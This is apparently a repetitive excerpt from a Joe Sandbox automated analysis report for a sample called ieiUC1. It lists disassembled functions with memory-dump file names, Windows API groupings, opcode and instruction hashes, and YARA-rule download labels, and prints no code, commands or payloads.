                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                          • Instruction ID: fb8a0c694f261048e2a3635423d47d3f045d463473195e3a5a677349551dc4fe
                                                                          • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                          • Instruction Fuzzy Hash: 53315D7260AB81CAEB608F60E8407ED7361FB89744F44803ADA9E87B94EF38D54CC750
                                                                          Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                          • String ID:
                                                                          • API String ID: 1269745586-0
                                                                          • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                          • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                                          • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                          • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                                          Function 00007FFAADBE76E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                          • Instruction ID: f7609b2fa1ebc9b344e50f128b9b2cdb8e939124512aaf27ddb18c0c41c0cdc7
                                                                          • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                          • Instruction Fuzzy Hash: 85318F32619B81C6DB60CF25E8403AE73A0FB89754F504135EAAD83B95EF3CC159CB40
                                                                          Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                          • String ID:
                                                                          • API String ID: 1445889803-0
                                                                          • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                          • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                                          • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                          • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                                          Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                          • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                          • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                                          • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                          • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                                          Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                          • String ID:
                                                                          • API String ID: 2202868296-0
                                                                          • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                          • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                                          • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                          • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                                          Function 00007FFAADBE1F50 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FFAADBE2051,?,?,?,?,?,?,00007FFAADBE7823), ref: 00007FFAADBE1F5B
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FFAADBE2051,?,?,?,?,?,?,00007FFAADBE7823), ref: 00007FFAADBE1F64
                                                                          • GetCurrentProcess.KERNEL32(?,?,00000001,00007FFAADBE2051,?,?,?,?,?,?,00007FFAADBE7823), ref: 00007FFAADBE1F6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                          • String ID:
                                                                          • API String ID: 1249254920-0
                                                                          • Opcode ID: 1143c147f6f41f66fbe2a433f256e02954d513518da8cc009d863eaeb919d219
                                                                          • Instruction ID: c36589636e219cafe05f60cbc1d0e04ca7e7560a6c86e5bf09df1e92a7b41a0f
                                                                          • Opcode Fuzzy Hash: 1143c147f6f41f66fbe2a433f256e02954d513518da8cc009d863eaeb919d219
                                                                          • Instruction Fuzzy Hash: E4D09E52E0A606C6F7181771E8156355211FB5EB41B449038C96FC5310ED3CD48DC784
                                                                          Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                          • String ID:
                                                                          • API String ID: 203985260-0
                                                                          • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                          • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                                          • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                          • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                                          Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                          • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                                          • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                          • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                                          Function 00007FFAADBF0248 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                          • Instruction ID: 6594efa080e29f330403f0249312d1d2f89db2aab4d91f571c370ac738f099de
                                                                          • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                          • Instruction Fuzzy Hash: 0AB12773605B89CBEB19CF29C88636C7BA0F749B48F14C921DAAD837A4DB39D855C740
                                                                          Function 00007FFAADBEA1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                          • Instruction ID: 038f60f575e907de332905cd9ee3a64c79dd8b52066b9dc68aa9ab67aeaf1ac6
                                                                          • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                          • Instruction Fuzzy Hash: 9F51F822B09781C5FB209B72E8445AE7BA4FB42B94F148134EEAC67B89EF3CD105C740
                                                                          Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: EntryFunctionLookup
                                                                          • String ID:
                                                                          • API String ID: 3852435196-0
                                                                          • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                          • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                                          • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                          • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                                          Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                          • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                                          • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                          • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                                          Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                          • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                                          • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                          • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                                          Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -
                                                                          • API String ID: 0-2547889144
                                                                          • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                          • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                                          • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                          • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                                          Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -
                                                                          • API String ID: 0-2547889144
                                                                          • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                          • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                                          • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                          • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                                          Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                          • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                                          • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                          • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                                          Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -
                                                                          • API String ID: 0-2547889144
                                                                          • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                          • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                                          • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                          • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                                          Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -
                                                                          • API String ID: 0-2547889144
                                                                          • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                          • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                                          • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                          • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                                          Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
